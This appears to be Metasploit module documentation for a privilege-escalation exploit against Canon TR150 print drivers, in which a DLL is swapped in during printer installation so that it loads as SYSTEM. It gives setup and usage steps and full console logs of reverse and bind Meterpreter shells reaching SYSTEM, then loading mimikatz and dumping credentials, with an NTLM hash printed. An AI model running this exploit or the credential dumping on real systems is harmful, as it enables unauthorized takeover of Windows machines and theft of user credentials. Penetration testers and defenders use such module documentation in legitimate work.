## Vulnerable Application Canon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files within the `CanonBJ` directory and its subdirectories. By overwriting the DLL at `C:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series\\LanguageModules\\040C\\CNMurGE.dll` with a malicious DLL at the right time whilst running the `C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs` script to install a new printer, a timing issue can be exploited to cause the `PrintIsolationHost.exe` program, which runs as `NT AUTHORITY\SYSTEM`, to successfully load the malicious DLL. Successful exploitation will grant attackers code execution as the `NT AUTHORITY\SYSTEM` user. This module leverages the `prnmngr.vbs` script to add and delete printers. Multiple runs of this module may be required given successful exploitation is time-sensitive. ## Installation Instructions 1. Download the driver installer from https://pdisp01.c-wss.com/gdl/WWUFORedirectTarget.do?id=MDEwMDAxMDY5OTAx&cmp=ABR&lang=EN 1. Open up the EXE and run it as an administrator. Wait for installation to finish. 1. Go to `Add a New Printer or Scanner`, then select `The printer that I want isn't listed`. You may need to hit the refresh button for this to show up. 1. Select `Add a printer using a TCP/IP address or hostname` and click `Next` 1. Under `Device Type` select `TCP/IP device`, and enter a random nonexisting IP address. 1. Uncheck `Query the printer and automatically select the driver to use` and click `Next`. 1. Wait for a bit then once prompted for more port info select `Standard` under `Device Type` and select `Canon Network Printer` for device type. 1. On the next screen select `Canon TR150 Series` and select `Next`. 1. Select `Use the driver that is currently installed (recommended)` and select the `Next` button. 1. Select `Next` and accept the default driver name, and the driver should install. ## Verification Steps 1. Install a vulnerable Canon TR150 driver using the steps from `Installation Instructions` 2. Start `msfconsole` 3. Get a session with basic privileges 4. Do: `use exploit/windows/local/canon_driver_privesc` 5. Do: `set SESSION ` 6. Do: `run` 7. You should get a shell running as `SYSTEM`. ## Options ## Scenarios ### Canon TR150 series v3.71.2.10 on Windows 10 Build 17134 ``` msf6 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 10.0.0.8 lhost => 10.0.0.8 msf6 exploit(multi/handler) > set lport 1270 lport => 1270 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.0.0.8:1270 [*] Sending stage (200262 bytes) to 10.0.0.7 [*] Meterpreter session 1 opened (10.0.0.8:1270 -> 10.0.0.7:49816) at 2021-08-05 11:14:25 -0400 meterpreter > getuid Server username: MOURNLAND\lowlevel meterpreter > sysinfo Computer : MOURNLAND OS : Windows 10 (10.0 Build 17134). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 1... msf6 exploit(multi/handler) > use exploit/windows/local/canon_driver_privesc [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/canon_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/canon_driver_privesc) > set lhost 10.0.0.8 lhost => 10.0.0.8 msf6 exploit(windows/local/canon_driver_privesc) > set session 1 session => 1 msf6 exploit(windows/local/canon_driver_privesc) > run [*] Started reverse TCP handler on 10.0.0.8:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Canon language driver directory grants Users full permissions [*] Dropping batch script to C:\Users\lowlevel\AppData\Local\Temp\YoBndh.bat [*] Adding printer ePzTcgz... [*] Sending stage (200262 bytes) to 10.0.0.7 [+] Deleted C:\Users\lowlevel\AppData\Local\Temp\YoBndh.bat [+] Deleted C:\Users\lowlevel\AppData\Local\Temp\CNMurGE.dll [*] Meterpreter session 2 opened (10.0.0.8:4444 -> 10.0.0.7:49819) at 2021-08-05 11:15:31 -0400 [*] Deleting printer ePzTcgz meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : MOURNLAND OS : Windows 10 (10.0 Build 17134). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > quit [*] Shutting down Meterpreter... ``` ### TR150 series Printer Driver Ver.1.00 On Windows 10 20H2 ``` msf6 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (generic/shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/bind_tcp PAYLOAD => windows/x64/meterpreter/bind_tcp msf6 exploit(multi/handler) > set RHOST 192.168.224.211 RHOST => 192.168.224.211 msf6 exploit(multi/handler) > exploit [*] Started bind TCP handler against 192.168.224.211:4444 [*] Sending stage (200262 bytes) to 192.168.224.211 [*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.224.211:4444) at 2021-08-09 14:11:47 -0500 meterpreter > getuid Server username: DESKTOP-DIK4B96\test meterpreter > getprivs Enabled Process Privileges ========================== Name ---- SeChangeNotifyPrivilege SeIncreaseWorkingSetPrivilege SeShutdownPrivilege SeTimeZonePrivilege SeUndockPrivilege meterpreter > getsystem [-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted: [-] Named Pipe Impersonation (In Memory/Admin) [-] Named Pipe Impersonation (Dropper/Admin) [-] Token Duplication (In Memory/Admin) [-] Named Pipe Impersonation (RPCSS variant) meterpreter > background [*] Backgrounding session 1... msf6 exploit(multi/handler) > use exploit/windows/local/canon_driver_privesc [*] Using configured payload windows/meterpreter/reverse_tcp msf6 exploit(windows/local/canon_driver_privesc) > set SESSION 1 SESSION => 1 msf6 exploit(windows/local/canon_driver_privesc) > show options Module options (exploit/windows/local/canon_driver_privesc): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 1 yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.224.128 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows msf6 exploit(windows/local/canon_driver_privesc) > set LPORT 8877 LPORT => 8877 msf6 exploit(windows/local/canon_driver_privesc) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/canon_driver_privesc) > show options Module options (exploit/windows/local/canon_driver_privesc): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 1 yes The session to run this module on. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.224.128 yes The listen address (an interface may be specified) LPORT 8877 yes The listen port Exploit target: Id Name -- ---- 0 Windows msf6 exploit(windows/local/canon_driver_privesc) > exploit [*] Started reverse TCP handler on 192.168.224.128:8877 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Canon language driver directory grants Users full permissions [*] Dropping batch script to C:\Users\test\AppData\Local\Temp\ssSffWM.bat [*] Writing DLL file to C:\Users\test\AppData\Local\Temp\CNMurGE.dll [*] Adding printer SFywU... [*] Deleting printer SFywU [*] Exploit completed, but no session was created. msf6 exploit(windows/local/canon_driver_privesc) > exploit [*] Started reverse TCP handler on 192.168.224.128:8877 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Canon language driver directory grants Users full permissions [*] Dropping batch script to C:\Users\test\AppData\Local\Temp\dsrlKmQ.bat [*] Writing DLL file to C:\Users\test\AppData\Local\Temp\CNMurGE.dll [*] Adding printer HRudL... [*] Sending stage (200262 bytes) to 192.168.224.211 [+] Deleted C:\Users\test\AppData\Local\Temp\dsrlKmQ.bat [+] Deleted C:\Users\test\AppData\Local\Temp\CNMurGE.dll [*] Meterpreter session 2 opened (192.168.224.128:8877 -> 192.168.224.211:61310) at 2021-08-09 14:13:12 -0500 [*] Deleting printer HRudL meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : DESKTOP-DIK4B96 OS : Windows 10 (10.0 Build 19042). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > getprivs Enabled Process Privileges ========================== Name ---- SeAssignPrimaryTokenPrivilege SeAuditPrivilege SeChangeNotifyPrivilege SeImpersonatePrivilege SeTcbPrivilege meterpreter > load kiwi Loading extension kiwi... .#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ Success. meterpreter > creds_all [+] Running as SYSTEM [*] Retrieving all credentials msv credentials =============== Username Domain NTLM SHA1 -------- ------ ---- ---- test DESKTOP-DIK4B96 0cb6948805f797bf2a82807973b89537 87f8ed9157125ffc4da9e06a7b8011ad80a53fe1 wdigest credentials =================== Username Domain Password -------- ------ -------- (null) (null) (null) DESKTOP-DIK4B96$ WORKGROUP (null) test DESKTOP-DIK4B96 (null) kerberos credentials ==================== Username Domain Password -------- ------ -------- (null) (null) (null) desktop-dik4b96$ WORKGROUP (null) test DESKTOP-DIK4B96 (null) meterpreter > ```